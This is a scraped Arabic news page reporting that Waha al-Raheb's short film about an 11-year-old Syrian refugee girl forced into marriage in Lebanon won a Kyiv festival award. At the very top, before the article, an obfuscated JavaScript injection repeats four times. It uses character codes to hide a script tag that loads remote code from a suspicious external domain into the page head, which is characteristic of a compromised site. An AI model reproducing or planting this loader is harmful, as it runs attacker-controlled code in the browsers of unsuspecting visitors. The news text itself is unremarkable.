Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); "قتل معلن" فيلم سوري للمخرجة واحة الراهب يفوز بجائزة مهرجان كييف بأوكرانيا | سيريانا برس

“قتل معلن” فيلم سوري للمخرجة واحة الراهب يفوز بجائزة مهرجان كييف بأوكرانيا

 

فاز فيلم “موت معلن” يوم الخميس بجائزة مهرجان كييف بأوكرانيا للفيلم الروائي القصير، الفيلم من إخراج واحة الراهب وبطولة مكسيم خليل وواحة الراهب ونجلاء الخمري بالإضافة للطفلة ماري جو صفدي.

يروي الفيلم الذي أخرجته وكتبته الراهب، قصة طفلة سورية في الـ11 من عمرها، تقطن مع عائلتها في مخيم للاجئين السوريين في لبنان، ووالدها يعمل عمل شاق لأوقات طويلة بأجور زهيدة وهو عاجز يمشي على العكاز، وأمها في شهرها الأخير من الحمل، وتستيقظ يوميًا على كوابيس تعكس حجم العنف المخزن في ذاكرتها، تضاف إليها المعاناة اليومية التي تعيشها مع أسرتها، إذ تفرض الحياة القاسية عليهم العمل في الحقول المجاورة.

وبسبب عنف الحياة المتراكم على كاهلي الأب والأم، والسعي الدؤوب لتأمين أجرة الخيمة التي يسكنون فيها، وتراكم الديون يدفع بهما لتزويج طفلتهما لابن جارتهما، الذي يكبرها بـ25 عاماً، بعدما أجادت إقناعهم بكلامها “كلنا تزوجنا أطفال وربينا شباب، عرسان شباب ما عاد في، انقتلوا بالحرب أو هجوا برات البلد”.

وافتتحت المخرجة فيلمها بأحجار تلقيها واحدة تلو الأخرى في مستنقع راكد، فيظهر مع كل حجر رمز أو مظهر من مظاهر العنف في مجتمعنا، زوج يضرب زوجته ومن ثم يغتصبها، معلم يعاقب تلاميذه في الصف، أب يحرم ابنته من قيادة الدراجة ويمنحها لشقيقها الأصغر، لتستيقظ الطفلة من كوابيسها مبللة فراشها.

حاولت الراهب إيصال رسائل مكثفة في فلمها رغم أنه بإمكانيات محدودة، وفي زمن قصير لا يتجاوز ربع ساعة، على أمل أن يساهم في إيصال صوت السوريين إلى العالم، وأن يكون له دور فعال في دعم حملات التوعية لقضايا العنف ضد المرأة، والحد من ظاهرة زواج القاصرات.

وقالت “الراهب”: “يزعم كثيرون أن الاقتصاد اللبناني يُهدر على اللاجئين السوريين، في الوقت الذي يعيش فيه مواطنونا داخل خيم من النايلون أرضيتها من الإسمنت، ويضطرون لدفع أجرتها من عملهم وعمل أطفالهم في الحقول”، متسائلة: “أين مساعدات الأمم المتحدة إذًا؟”، مشيرة للوضع المعيشي السيئ الذي يكابده السوريون اللاجئون في لبنان يومياً.

اترك رد

بريدك الالكتروني لن يكون ظاهراً